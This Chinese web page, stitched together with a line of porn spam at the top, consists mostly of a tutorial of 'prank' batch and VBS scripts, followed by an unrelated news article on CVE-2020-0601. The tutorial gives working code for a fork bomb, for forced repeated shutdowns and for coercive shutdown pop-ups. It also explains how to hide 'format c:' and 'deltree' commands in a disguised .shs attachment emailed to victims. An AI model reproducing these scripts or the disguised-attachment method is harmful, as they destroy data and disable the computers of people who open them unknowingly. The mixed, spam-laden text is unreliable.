操屁眼的视频在线免费看,日本在线综合一区二区,久久在线观看免费视频,欧美日韩精品久久综

新聞資訊

    新建文本文檔(txt) 在里面輸入內(nèi)容保存后把后綴改成cmd 或者是bat 下方有教程

    第一個(gè):讓別人內(nèi)存OVER(逼他重啟)

    @echo off

    start cmd

    %0

    就這3行了

    打開“開始→程序→附件→記事本”,把代碼部分復(fù)制進(jìn)去,點(diǎn)“另存為”,路徑選“你想要放的地方”,保存類型為“所有文件”,文件名為“你想要的名字.bat”,你的批量處理器就完成了。

    第二個(gè):讓對(duì)方重啟指定次數(shù)(害人專用)

    @echo off

    if not exist c:1.txt echo. >c:1.txt ; goto err1

    if not exist c:2.txt echo. >c:2.txt ; goto err1

    if not exist c:3.txt echo. >c:3.txt ; goto err1

    if not exist c:4.txt echo. >c:4.txt ; goto err1

    if not exist c:5.txt echo. >c:5.txt ; goto err1

    goto err2

    :err1

    shutdown -s -t 0

    :err2

    上面可以讓對(duì)方電腦重啟5次后不在重啟,當(dāng)然如果你修改一下加個(gè)if not exist c:6.txt echo. >c:6.txt ; goto err1那就是重啟6次

    改成7就是7次...

    打開“開始→程序→附件→記事本”,把代碼部分復(fù)制進(jìn)去,點(diǎn)“另存為”,路徑選“你想要放的地方”,保存類型為“所有文件”,文件名為“你想要的名字.bat”,你的批量處理器就完成了。

    第三個(gè):善意惡搞關(guān)機(jī)

    首先呢,我們?cè)谧烂鎰?chuàng)建個(gè)新文件夾然后打開,在上面找到-工具T-文件夾選項(xiàng)O-查看

    把隱藏已知文件類型的擴(kuò)展名前面的勾去掉.

    然后我們開始制作.在桌面建立個(gè)記事本,然后把下面代碼復(fù)制進(jìn)去

    on error resume next

    dim WSHshellA

    set WSHshellA=wscript.createobject("wscript.shell")

    WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""說我是豬,不說我是豬就一分鐘關(guān)你機(jī),不信,試試..."" ",0 ,true

    dim a

    do while(a <> "我是豬")

    a=inputbox ("說我是豬,就不關(guān)機(jī),快撒,說 ""我是豬"" ","說不說","不說",8000,7000)

    msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"

    loop

    msgbox chr(13) + chr(13) + chr(13) + "早說就行了嘛"

    dim WSHshell

    set WSHshell=wscript.createobject("wscript.shell")

    WSHshell.run "cmd.exe /c shutdown -a",0 ,true

    msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,一切皆有可能~"

    復(fù)制之后呢,把后綴修改為.vbs或者改變打開方式為應(yīng)用程序,這樣你再壓縮下用qq發(fā)給你朋友,對(duì)方打開了就在60秒內(nèi)要關(guān)閉計(jì)算機(jī),

    結(jié)束任務(wù)都不行,他只能說他是豬才能解決問題。夠壞吧? 注意哦,你可以把我是豬那個(gè)修改成任意想說的話,要是對(duì)付你喜歡的人,

    就修改成 我愛你 這樣他只有說我愛你之后才不關(guān)閉計(jì)算機(jī) 也可以把時(shí)間修改為20 就是說打開了20秒就關(guān)了,還沒等對(duì)方打完就關(guān)機(jī)了 是不是叫對(duì)方很郁悶?zāi)?

    第四個(gè):讓人崩潰的關(guān)機(jī)程序

    首先你可以看下面的

    WScript.Echo("嘿,謝謝你打開我哦,我等你很久拉!";TSName)

    WScript.Echo("你是可愛的XX童鞋嗎?")

    WScript.Echo("哈,我想你拉,這你都不知道嗎?")

    WScript.Echo("怎么才來,說~是不是不關(guān)心我")

    WScript.Echo("哼,我生氣拉,等你這么久,心都涼啦。")

    WScript.Echo("夜黑很生氣,后果很嚴(yán)重哦。")

    WScript.Echo("嘿嘿!你也會(huì)很慘滴哦")

    WScript.Echo("是不是想清除我?")

    WScript.Echo("那你要點(diǎn)上50下哦,不過會(huì)給你驚喜滴")

    WScript.Echo("還剩49下,快點(diǎn)點(diǎn)哦")

    WScript.Echo("還剩48下,快點(diǎn),小笨蛋!")

    WScript.Echo("還剩47下對(duì),就這樣快點(diǎn)點(diǎn)!")

    WScript.Echo("還剩46下。你啊就是笨,要快哦,我先不打擾你工作。")

    WScript.Echo("還剩45下,記得要快哦!")

    WScript.Echo("還剩43下")

    WScript.Echo("還剩42下")

    WScript.Echo("還剩41下")

    ...........

    WScript.Echo("還剩13下停停")

    WScript.Echo("還剩12下,你繼續(xù)點(diǎn)我就會(huì)消失滴")

    WScript.Echo("還剩11下,以后就看不到我拉。嗚嗚~555555")

    WScript.Echo("還剩10下,你現(xiàn)在可以選擇停止!")

    WScript.Echo("還剩9下。你還點(diǎn)啊,不要我拉?")

    WScript.Echo("還剩8下,有點(diǎn)傷心拉,干嘛丟棄人家")

    WScript.Echo("還剩7下。瘋了,你有點(diǎn)負(fù)意!")

    WScript.Echo("還剩6下。對(duì)。你就點(diǎn)吧,我恨你!")

    WScript.Echo("還剩5下,不明白,刪除我你就好嗎?")

    WScript.Echo("還剩4下!真要?jiǎng)h除我?")

    WScript.Echo("還剩3下。可是我真的很眷戀你。。。")

    WScript.Echo("還剩2下。不要這么絕情嘛,人家是愛你的!")

    WScript.Echo("還剩1下。哼,既然你這么絕情。也別怪我無義!!!")

    WScript.Echo("我本因該消失的,不過我留戀你滴芳容,萬能的上帝又給了一次機(jī)會(huì)。")

    WScript.Echo("想結(jié)束我么?那你就再多點(diǎn)一次")

    WScript.Echo("想結(jié)束我么?那你就再多點(diǎn)一次")

    WScript.Echo("想結(jié)束我么?那你就再多點(diǎn)一次")

    WScript.Echo("想結(jié)束我么?那你就再多點(diǎn)一次")

    把這個(gè)復(fù)制在記事本,把后綴修改成.vbs

    在打開呢就會(huì)先說第一句的 嘿,謝謝你打開我哦,我等你很久拉!

    他無論是點(diǎn)關(guān)閉或者是點(diǎn)確定都會(huì)再說第2句

    再點(diǎn)就說地3句 會(huì)按順序說完

    你們注意哦,最后10句話,只是10句,你要是把這個(gè)復(fù)制再粘貼N次,那他還有個(gè)打完呢?

    這樣才做到整人了,要是給喜歡的人發(fā)去啊,那就寫你要說的話吧,雙引號(hào)里面的可以隨便更改

    這個(gè)最簡(jiǎn)單的就是結(jié)束任務(wù)進(jìn)程來結(jié)束

    最后一個(gè)惡意的攻擊程序(入門級(jí)黑客攻擊小程序,慎用!!)

    1.創(chuàng)建一個(gè)只包含一個(gè)空格(為了減小文件體積)的文本文件,任意取名。

    2.打開{寫字板文檔},將此文件拖放入{寫字板文檔}。也可以點(diǎn)擊記{寫字板文檔}單欄中的“插入\對(duì)象”,彈出“插入對(duì)象”對(duì)話框,選中“從文件創(chuàng)建”,然后點(diǎn)擊“瀏覽”按鈕選擇要插入的文件。

    3.選中該插入對(duì)象的圖標(biāo),選擇菜單欄中的“編輯\包對(duì)象\編輯包”(如圖1)。在彈出的“對(duì)象包裝程序”對(duì)話框中,選擇菜單欄中的“編輯\命令行”,然后輸入如下命令:start.exe/m format c:/q /autotest /u ,點(diǎn)擊“確定”,此時(shí),內(nèi)容欄中會(huì)顯示出命令內(nèi)容。

    4.點(diǎn)擊外觀欄中的“插入圖標(biāo)”按鈕,會(huì)彈出一個(gè)警告對(duì)話框,確認(rèn),然后任選一個(gè)圖標(biāo)。

    5.選擇菜單欄中的“編輯\卷標(biāo)”,為此嵌入對(duì)象取一個(gè)名稱(會(huì)替換原來的文件名稱)。點(diǎn)擊“文件”菜單中的“更新”,然后關(guān)閉此對(duì)話框。

    6.將剛剛建立的嵌入對(duì)象拖放到桌面上。文件的默認(rèn)名是“碎片”(在win2000下的默認(rèn)名為”片段”),現(xiàn)在我們把它改成“password01.txt”。打開電子郵件程序?qū)⒆烂嫔系摹皃assword01.txt”作為附件發(fā)出,或者將含有嵌入對(duì)象(帶有惡意命令)的文檔作為附件發(fā)出。

    7.當(dāng)郵件接收者誤將“password01.txt.shs”文件作為“password01.txt”(如前文所述,“.SHS”擴(kuò)展名永遠(yuǎn)是隱藏的)放心地打開時(shí),或打開文件,點(diǎn)擊文件中的嵌入對(duì)象時(shí)觸發(fā)惡意命令(彈出DOS運(yùn)行窗口,執(zhí)行格式化命令).如果將上面的命令替換為:start.exe/m deltree /y a:\*.* c:\*.* d:\*.* 則是將刪除對(duì)方硬盤下所有文件(盤符根據(jù)實(shí)際情況自定義);如果替換為:start.exe/m deltree /y c:\windows\system\*.* 則是刪除對(duì)方c:\windows\system\目錄底下的所有文件.(當(dāng)然大家可以改成其它的命令)


    這些小程序小編曾經(jīng)也用過幾個(gè),無奈都被殺毒軟件消滅了或者人家根本不吃你這套,只有自己做自己試,好幾次把自己電腦給關(guān)了,現(xiàn)在win10也沒有測(cè)試過這些程序還有沒有用,畢竟小編也是一個(gè)外門漢,感興趣的朋友不妨嘗試一下。

    微軟披露漏洞突破證書驗(yàn)證機(jī)制還不到24個(gè)小時(shí),研究人員就演示了攻擊。



    NSA官網(wǎng)被惡搞,使用Windows 10上的Chrome。


    微軟披露有史以來最嚴(yán)重的一個(gè)Windows漏洞還不到一天,就有安全研究人員演示了攻擊者如何鉆該漏洞的空子,從密碼層面冒充互聯(lián)網(wǎng)上的任何網(wǎng)站或服務(wù)器。


    周三,研究人員Saleem Rashid在Twitter上發(fā)布了上世紀(jì)80年代的知名歌手Rick Astley的視頻《Never Gonna Give You Up》在Github.com和NSA.gov上播放的畫面。



    這種數(shù)字手法名為瑞克搖擺(Rickrolling),常被用作以一種惡搞、無害的方式來表明嚴(yán)重的安全漏洞。在這里,Rashid采用的攻擊程序?qū)е翬dge瀏覽器和Chrome瀏覽器都騙過了Github和國家安全局(NSA)的HTTPS驗(yàn)證網(wǎng)站。Brave及其他Chrome衍生瀏覽器以及Internet Explorer也可能中同樣的招。(沒有跡象表明Firefox受此影響。)


    Rashid模擬了攻擊漏洞:CVE-2020-0601,微軟接到NSA私下透露的情況后在周二給這個(gè)嚴(yán)重漏洞打上了補(bǔ)丁。正如外媒此前報(bào)道,該漏洞可以完全突破許多網(wǎng)站、軟件更新、VPN及其他安全攸關(guān)的計(jì)算機(jī)用途所采用的證書驗(yàn)證機(jī)制。它影響Windows 10系統(tǒng),包括服務(wù)器版本:Windows Server 2016和Windows Server 2019。Windows的其他版本不受影響。


    Rashid告訴我,他的攻擊程序使用了大約100行代碼,但如果他想去除其攻擊所擁有的“幾個(gè)實(shí)用花招”,可以壓縮到10行代碼。雖然讓攻擊漏洞在實(shí)際情形下得逞存在一些限制和幾個(gè)可能很難滿足的要求,周三的概念驗(yàn)證攻擊表明了NSA為何將該漏洞評(píng)為“嚴(yán)重”等級(jí),稱狡猾的黑客會(huì)明白如何“迅速”利用漏洞。


    “很可怕”


    其他研究人員與NSA有著同樣的緊迫感。


    MongoDB的研究人員和安全負(fù)責(zé)人Kenn White說:“Saleem剛演示的表明,使用[簡(jiǎn)短]的腳本,你就可以為任何網(wǎng)站生成證書,而且證書在IE和Edge上完全受信任,僅使用Windows的默認(rèn)設(shè)置。這很可怕。它會(huì)影響VPN網(wǎng)關(guān)、VoIP以及使用網(wǎng)絡(luò)通信的幾乎任何系統(tǒng)。”(在Rashid演示針對(duì)Chrome進(jìn)行攻擊之前,我與White有過交談。)


    該漏洞涉及新版本W(wǎng)indows對(duì)使用橢圓曲線加密技術(shù)(ECC)的證書的有效性進(jìn)行核查的方式。雖然易受攻擊的Windows版本核查三個(gè)ECC參數(shù),卻沒有核查第四個(gè)關(guān)鍵的參數(shù):基點(diǎn)生成器,它在算法中通常表示為G'。這歸咎于微軟實(shí)現(xiàn)ECC的方法,而不是ECC算法本身存在任何漏洞或缺陷。


    攻擊者只要提取Windows默認(rèn)情況下隨帶的根證書的公鑰,就可以鉆這個(gè)漏洞的空子。這些證書之所以被稱為根證書,是由于它們屬于各大證書管理機(jī)構(gòu)(CA),這些CA要么頒發(fā)自己的TLS證書,要么驗(yàn)證代表根CA出售證書的中間CA。只要用ECC算法來簽名,任何根證書都可正常使用。Rashid的攻擊始于來自互聯(lián)網(wǎng)界最大的CA:Sectigo的根證書,Sectigo以前使用Comodo這個(gè)名稱。這名研究人員隨后修改了攻擊手法,使用GlobalSign根證書。他的代碼可使切換自動(dòng)進(jìn)行。


    該攻擊者分析了用于生成根證書公鑰的特定ECC算法,隨后生成了一個(gè)私鑰,復(fù)制了該算法的所有證書參數(shù)(基點(diǎn)生成器除外)。由于易受攻擊的Windows版本無法核查該參數(shù),因此它們視為該私鑰有效。這么一來,攻擊者就騙過了Windows信任的根證書,該根證書可進(jìn)而生成用于對(duì)網(wǎng)站、軟件及其他敏感內(nèi)容進(jìn)行身份驗(yàn)證的任何證書。


    這種行為相當(dāng)于執(zhí)法人員核查某人的身份證,確保身份證如實(shí)描述此人的身高、住址、生日和臉部,卻沒有注意到標(biāo)注的重量是250磅,而此人明明體重不到一半。


    White說:“這個(gè)漏洞很奇怪,因?yàn)檫@就像對(duì)整個(gè)信任系統(tǒng)的基礎(chǔ)只核查了一半,而這是整條信任鏈的核心部分。”


    注意事項(xiàng)


    如前所述,有幾個(gè)要求和限制大大提高了Rashid的攻擊在實(shí)際情形下得逞的難度。首先是它很可能需要主動(dòng)的中間人攻擊。這種類型的攻擊篡改網(wǎng)絡(luò)中傳輸?shù)臄?shù)據(jù),可能難以實(shí)施。主動(dòng)式中間人攻擊之外的替代手法是,說服攻擊對(duì)象點(diǎn)擊虛假的URL。這種方法容易得多,但也需要一定的針對(duì)性。(它不適用于對(duì)要求連接客戶端提供證書的網(wǎng)站或其他服務(wù)器發(fā)動(dòng)的攻擊。)


    該漏洞還要求攻擊對(duì)象最近訪問過使用傳輸層安全證書的站點(diǎn),而該證書鏈接到ECC簽名的根證書。那是由于根證書必須已經(jīng)被目標(biāo)系統(tǒng)緩存起來。Rashid表示,如果目標(biāo)系統(tǒng)沒有緩存根證書,攻擊者仍可以成功地鉆空子,只需添加可訪問鏈接到根證書的網(wǎng)站的JavaScript。


    另一個(gè)限制是:Chrome針對(duì)google.com及其他眾多敏感網(wǎng)站使用了一種名為證書鎖定(certificate pinning)的機(jī)制。證書鎖定要求對(duì)網(wǎng)站進(jìn)行身份驗(yàn)證的證書包含特定的加密哈希,即使提供的證書在其他方面有效。該措施可阻止攻擊騙過受保護(hù)的網(wǎng)站后得逞。


    谷歌代表稱,雖然安裝微軟周二發(fā)布的補(bǔ)丁是防止攻擊的唯一合理方法,但Chrome的開發(fā)人員已發(fā)布了測(cè)試版的修復(fù)程序,很快會(huì)并入到穩(wěn)定版中。提醒一下:即使使用該修復(fù)程序,高危Windows版本的用戶仍將面臨來自其他攻擊場(chǎng)景的巨大風(fēng)險(xiǎn)。


    時(shí)間問題


    盡管面臨幾個(gè)要求和限制,該漏洞仍很嚴(yán)重。正如NSA官員在公告中所說:


    該漏洞使Windows端點(diǎn)暴露在眾多攻擊途徑面前。NSA評(píng)估后認(rèn)為該漏洞很嚴(yán)重,狡猾的網(wǎng)絡(luò)攻擊者很快就能明白底層漏洞;一旦被利用,會(huì)使前面提到的平臺(tái)岌岌可危。不給漏洞打補(bǔ)丁會(huì)帶來嚴(yán)重且廣泛的后果。遠(yuǎn)程攻擊工具可能會(huì)迅速開發(fā)出來,唾手可得。迅速打上補(bǔ)丁是眼下唯一已知的緩解方法,應(yīng)是所有網(wǎng)絡(luò)所有者關(guān)注的焦點(diǎn)。


    該漏洞可能不會(huì)像2014年Heartbleed漏洞那樣造成極嚴(yán)重的威脅,Heartbleed漏洞讓攻擊者可以從成千上萬個(gè)易受攻擊的網(wǎng)站竊取私鑰、密碼及其他高度敏感的數(shù)據(jù)。但由于微軟的這個(gè)漏洞挫敗了廣泛的安全措施,它甚至比蘋果嚴(yán)重的GoToFail漏洞還危險(xiǎn),后者阻止iOS和macOS系統(tǒng)檢測(cè)到網(wǎng)站提供的無效TLS證書。這使CVE-2020-0601成為近年來最嚴(yán)重的漏洞之一。


    Windows的自動(dòng)更新機(jī)制可能已經(jīng)給易受攻擊的系統(tǒng)打上了補(bǔ)丁。此處(https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0601#ID0EGB)附有各種高危版本的修復(fù)程序。還沒有打上補(bǔ)丁的讀者應(yīng)立即打上補(bǔ)丁。

網(wǎng)站首頁   |    關(guān)于我們   |    公司新聞   |    產(chǎn)品方案   |    用戶案例   |    售后服務(wù)   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區(qū)    電話:010-     郵箱:@126.com

備案號(hào):冀ICP備2024067069號(hào)-3 北京科技有限公司版權(quán)所有